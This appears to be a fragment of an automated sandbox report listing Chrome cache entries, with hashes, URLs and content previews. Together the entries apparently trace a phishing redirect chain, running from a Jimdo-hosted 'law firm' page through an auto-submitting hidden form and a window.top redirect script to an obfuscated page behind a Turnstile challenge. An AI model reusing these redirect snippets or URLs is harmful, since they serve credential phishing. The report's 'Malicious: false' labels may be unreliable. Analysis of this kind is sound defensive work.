Preview:	......JFIF.............BExif..MM........i................@........J..@....................C.......................................%..%....)).%756.2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..2C6...U.7.....2T`..:c....U.6...}.T...>7......O.#.....Y.H..H}...t.u..^8.....6..,.o?.=........._..T.9.?.J#..h..YU.C...Zz.C]...{&<...e..%.>..q.6..3.1.V..4......:c...8..I.x-...$...-.99..%y..j?..g..a.`............>o.........../...?....=8...7..?Z..{...b$rGL..x.J.\..I....?.~.{.....?.5.[..i$..n#......

Chrome Cache Entry: 86

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (13664)
Category:	downloaded
Size (bytes):	136879
Entropy (8bit):	5.511604707653524
Encrypted:	false
SSDEEP:
MD5:	CC8AFCB83873719C3F93DFD6F80E4F7B
SHA1:	548A2D1E5EBB35881626BC355552B25C95E56626
SHA-256:	4D7EFFC4069E3C0B62F1E35C03B21EFC6ACF30125E4E9FAA2FD8ACC9BDF5D14D
SHA-512:	919F36942E78BAF5885D7EE0509978BBF9EFA7CE325B6E1B2EFCB54E9B28933DF8041D58F8D74D533EC1503201AE7F78567C893F240FCE8B57B86864FB28119C
Malicious:	false
Reputation:	unknown
URL:	https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/3b185c0927e06bd86210.css
Preview:	.rdtDR{position:relative;z-index:3;width:100%}.EiaDC{z-index:4}.eP8Dq{display:flex;flex-direction:column}...hcw3J{color:#323335}.hcw3J a:hover{color:#535353}.KNvh9{color:#fff}.KNvh9 a:hover{color:#dcdcdc}..sTtmz{word-wrap:break-word;word-break:break-word;overflow-wrap:break-word;box-sizing:border-box;width:100%;padding:20px 0}.sTtmz.FG8T_{padding:5px}.sTtmz a,.sTtmz a:hover{color:inherit}.sTtmz ol,.sTtmz ul{margin:0 0 0 30px;padding:0}.jkRjK h1,.jkRjK h2,.jkRjK h3,.jkRjK h4,.jkRjK h5,.jkRjK h6,.jkRjK li,.jkRjK p{display:inline;margin-right:4px;font-weight:400;font-size:18px}..YH0K9{position:relative;width:100%;padding:0;line-height:0}.YH0K9.gBwSj{background:#181818}.YH0K9.gBwSj.S5qxR{background:none}.YH0K9.BuD0P{background:#f2f2f2}.YH0K9.aPnO4{background:#fff}.YH0K9.mLGql{margin:auto}.YH0K9.bDzAf,.YH0K9.zDzDH{flex-grow:1}.YH0K9 iframe{width:100%;height:500px;border:0}.YH0K9 iframe.sK02L{height:232px}.YH0K9 iframe.GZWz7{height:450px}.YH0K9 iframe.U5VF7{height:175px}.gszAl{position:relat

Chrome Cache Entry: 87

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47671)
Category:	downloaded
Size (bytes):	47672
Entropy (8bit):	5.401485603098283
Encrypted:	false
SSDEEP:
MD5:	50F3A3481E337DFA2F93536446BC7A89
SHA1:	FF4B88924D7CB89F479CCA480D067FC481E51679
SHA-256:	88EFD572595CD9C30F9D1E2C5451DCEDF6D973025C4F4678F2027B46C2C3D363
SHA-512:	5F2E82E13C008B627F274F7BDCC08BEB9BF91CC50BD162BDB1ABCEAFB02DB8924FAA58865874344B592661C5B79565D515E8CE6F6DB049CF8272D80B9A48B1AA
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/g/ccb741a09fd3/api.js
Preview:	"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 88

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47992), with no line terminators
Category:	downloaded
Size (bytes):	47992
Entropy (8bit):	5.605846858683577
Encrypted:	false
SSDEEP:
MD5:	CF3402D7483B127DED4069D651EA4A22
SHA1:	BDE186152457CACF9C35477B5BDDA5BCB56B1F45
SHA-256:	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
SHA-512:	9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt\|\|function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create\|\|function(t){var e;return n.prototype=t,e=new n,n.prototype=null

Chrome Cache Entry: 89

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (8550)
Category:	downloaded
Size (bytes):	18907
Entropy (8bit):	5.518482015238217
Encrypted:	false
SSDEEP:
MD5:	DEC424AA2A59AA15AE21CE0C08137BC6
SHA1:	1DB0F9DABD2E55460AF40BADC78A1E295DAEA4DB
SHA-256:	52649B0EE2A619C889382C897DA961E60DD31E68C24FFFCC252E4BA9F451FFF3
SHA-512:	D25F89238E19551F4AC6EC18421E8BA0DD90C17D08999D1903DAB8D6EAB03FB9D7ECAA3A0F51B067FD86FEE5BB9E6F70B632FF5B8DC15C62C05B16860729C9AD
Malicious:	false
Reputation:	unknown
URL:	https://ys-law-firm.jimdosite.com/
Preview:	<!doctype html>.<html lang="en">. <head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="format-detection" content="telephone=no">. <link rel="preconnect" href="https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/" crossorigin>. <link rel="preconnect" href="https://jimdo-storage.freetls.fastly.net/" crossorigin>. <link rel="preconnect" href="https://fonts.jimstatic.com/" crossorigin>. <link rel='shortcut icon' type='image/png' href="https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png" />. <title>Home \| YS LAW FIRM</title>. <script>. window.__dolphin_environment__ = 'prod';. </script>. . <meta name="robots" content="noindex, nofollow, noarchive"><meta name="twitter:card" content="summary_large_image">.<meta property="og:type" content="website">.<meta property="og:title" content="Home \| YS LAW FIR

Chrome Cache Entry: 90

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (3105), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	6814
Entropy (8bit):	5.713222574551831
Encrypted:	false
SSDEEP:
MD5:	329DDF8026D0A517CFB3912FCA337D52
SHA1:	2D3899EA4A36C423883A7757E1FDDBFDA4E9D4AC
SHA-256:	C1D599471DD1AEA38F8BA58868EFAD64CDCFF8350FE2D863A6EC53F4EF02F495
SHA-512:	B0237925B88400F0C11B2768FF0037093487C43B803A57C5D02700AD89238D22F3AE4284303FD8E54C07D8F611952705B3213605A76D92B99F4D84738BDAD3F5
Malicious:	false
Reputation:	unknown
URL:	https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html
Preview:	<html>.... .<head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.....<meta name="robots" ..content="noindex, nofollow">..... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js">..</script>.... <script.src="https://challenges.cloudflare.com/turnstile/v0/api.js">..</script>..... <style>....#nameable {display: flex; .align-items: center;.. justify-content:.center; flex-direction:..column;..padding-top: . 22%;}.#gain...{padding-top: .3%;} @keyframes bounce {0%,..100%, 12.5%,. 32.5%,..76.1%..{transform:..translateY(0);}22.5%,. .86% {transform: translateY(7px);}}#vacationer. .{height:. 179px;width: . 130px;overflow: hidden;margin-top:..-59px;}@keyframes. shadow-fade.{0%, .100%,..21.2%, .80%. {opacity:..0;}47%, 70% {opacity:...1;}}#fabled {width:.130px;margin-top:.179px;}#daemonic {width: 130px;height: . 71px;border-radius:..0 . 0 .7px .7px;overflow: hidden;margin-top: .-41px;}#daemonic > ..zany {width:..287px;height: .71

Chrome Cache Entry: 92

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 8000, version 1.0
Category:	downloaded
Size (bytes):	8000
Entropy (8bit):	7.97130996744173
Encrypted:	false
SSDEEP:
MD5:	72993DDDF88A63E8F226656F7DE88E57
SHA1:	179F97EC0275F09603A8DB94D4380EB584D81CD5
SHA-256:	F4E80D9DFD374D02989B87A27B5ED4CB78FBB177C27F1478E9A8B0AFB7513149
SHA-512:	7C20165F9D22A86341E841FD58526209017DCDE2AFE2D0D2A89FE853D95DC69F658D25CF798C71F452DAB09843FC808C1AE87A60B1284134163ABF5A1D93E50A
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2
Preview:	wOF2.......@......?@.................................`..T..t...6..6.$..h. ..T.....1E.r.8...KD......2.>L.......0..c.h...y_)s...N..(._C,/.v...7B...Z..gT@....u*.\t.9....{.&.;<...j.2.H-...A.S......E..)..f.Y8vuw^.^_.n{.Z..U.h..Kcm.........E..........'.J.-.-.......=.."...E...../R.8P....>?.]...R..Ag:.Pt..j..s..pG. .!f?.Q.T.".O.....D.r......3>gJN!V.\.!....+.......X.B.v....c9.&iW-[.,.. ...Q.k%I.s.%...d...8q..._~.C.n".v0..6B.eT..?..7.....l....3..7...M...5......k......^.....F.v~\|.....3N=.....[.!......}....F(...fA..c)0X$,FYL..=).(h<4...M5..<3.c....K/.{.p....3+'W...Z.[..;.w.....X....nx..v.(c;._.W......\|.b.....{...9..A6...V\|.N...Z?+\|H/.#.W%.._.8,...>._..w...RP..-.?.k7X..".._S.3,J.........&.8Gs.?yH.Yx......I_....._o.0K......(e.Q.W....=...J.7.\k.n.pd.....s..%...sD......_..&-...(.7..6.U..&<~8...9......uV..\|h.#m\.d./!....s.......b.j. ."...wX...B.`..Bj=......VnM....p..k.%..U.F..-VN).Y........_..W.p...B..\|.j..f..7....).~....n......c.3....t.......s..>...

Chrome Cache Entry: 93

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (357), with CRLF line terminators
Category:	downloaded
Size (bytes):	403
Entropy (8bit):	5.020252465208617
Encrypted:	false
SSDEEP:
MD5:	865DCCAFD44A49DC00798EEE5C89670C
SHA1:	F6992FEFB0CE9D28DD5FA840DA49A2529A06076E
SHA-256:	9C6A7FFF6C05490CBB7B59D095B0AFEBA9AD97C49A1B3D4B889FD03004DB33CC
SHA-512:	DB7843E54C5479C842DFB0A3EA533E134AEF7272668741FE94CC126F9AF5F7369B1FDCA528DDF8C3E82E8A09BD46FEAF279B4342BB94C341AD54A3160B6EBAD9
Malicious:	false
Reputation:	unknown
URL:	https://www.primechoicefinance.com.au/dykjj.php?71924463544244594177434158516a557269306273544f41455374435251612f733130656e744f37774d314434544362657145466375566f34593439773443644e4874646e44554e724e645a715774516670645274654c52694c7330584b435038421
Preview:	<form method="POST" action="https://www.primechoicefinance.com.au/dykjj.php"><input type="hidden" name="div" value="4463544244594177434158516a557269306273544f41455374435251612f733130656e744f37774d314434544362657145466375566f34593439773443644e4874646e44554e724e645a715774516670645274654c52694c7330584b43503842"><input type="hidden" name="e" value="1"></form>..<script>document.forms[0].submit();</script>

Chrome Cache Entry: 95

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
Category:	downloaded
Size (bytes):	18596
Entropy (8bit):	7.988788312296589
Encrypted:	false
SSDEEP:
MD5:	C83E4437A53D7F849F9D32DF3D6B68F3
SHA1:	FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
SHA-256:	D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
SHA-512:	C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
Preview:	wOF2......H...........H=................................\|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q.......uD.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..\|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.\|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..\|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.

Chrome Cache Entry: 96

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	3862
Entropy (8bit):	7.933153293209179
Encrypted:	false
SSDEEP:
MD5:	16BCF47EF3D5391EAA49357D7E80D91C
SHA1:	E5B6686FFA5CA7970BF344A26B3B9910CC781F73
SHA-256:	AA04B44417D17C58156D0D615E44A046EB4B218480CF93227BC6964AB90ABD66
SHA-512:	728CF7CFDAC6947741919427AF30C1C005BE772491F67D98864E867C063B9DA798031E7C5DC2ACC0C571258BC8EDE200AD017D0C96221F3750B23FE029B16A24
Malicious:	false
Reputation:	unknown
URL:	"https://jimdo-storage.freetls.fastly.net/image/488643626/259954c8-51ab-4780-8a60-3933de010ff0.png?quality=80,90&auto=webp&disable=upscale&width=127.76000000000002&height=77&trim=0,20,0,12"
Preview:	RIFF....WEBPVP8L..../....U.......=..1....f.........^<.v.._l.9.f..........!bffffffffff..o.n..R'..A...4p.S...T...T.R)."...s.-..P.....[....f...U.&..R.a/.p...SGja..&..6.=.(..8...\.7..T...j0..+.......h..)..H.][.'\|............f.m.:..'O.......v...{....kfffffffffffff......A...9r.\|j1......P....E..D...xR.0.i-E.......t..H.Kq.....S.".&..d.....Ig-E...+p..%8........u...Z.).T...)u......d^..`...@.$.u..l.m...Y..>.....9...I..^.'...#;.y.{... ..0...CxHNO\.{l?...W..... .@P...r.~...\.\..y.....fi....6....+.7d.......97wz.....v.d...U..U./....g....s`Ge.P...Z...UV..M...I.:..W....Q\..cl...X.....N..D..s.0B.<.m...s..h;...>.zz.h..^..5....? _.......;...x.$?.n*..+...[..{...'L...mj..0.5.5.......Z...-.....7..Ax.I.\.Z<I..!.Q6...5..w....x4W..YR@.[..U....."g:...P.HC........R-,....[a..r.3g.)..C.Rk'.....~.W.s..PX7......m..@z........./.t....))z.8....&d..I.Q..A../.L.G...t..c....F..Ji.e.....{.u.3....I.J.-......2...+Q.lu.7.......O0..$..,..(u.$;...i..l.g.Z@.$F........Fi.Z\-. ..Y8..

Chrome Cache Entry: 99

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	127
Entropy (8bit):	4.757764081160994
Encrypted:	false
SSDEEP:
MD5:	5EBB8C3BBD7FD2D17A47BC1532849789
SHA1:	CE9B88ACBE599BD0F26CDA4127795B38C93A3357
SHA-256:	546BF18A57B92D2722F4D46A35C3C8C985FAEBB39040C3029A1D226D30F6F364
SHA-512:	0FC2E5AD14E3FD96CD878B3B2D946E67EAE533AD65834DF804D21963F663D8B609D23DE170091A363335A04A15B91BAF221E8D553851F453E10FAECCF332865A
Malicious:	false
Reputation:	unknown
URL:	https://www.primechoicefinance.com.au/dykjj.php
Preview:	<script>window.top.location.href = "https://carpetcleaningmanitoba.ca/z/private/file22ESsm/equityentityclaim.html#41";</script>

Static File Info

⊘No static file info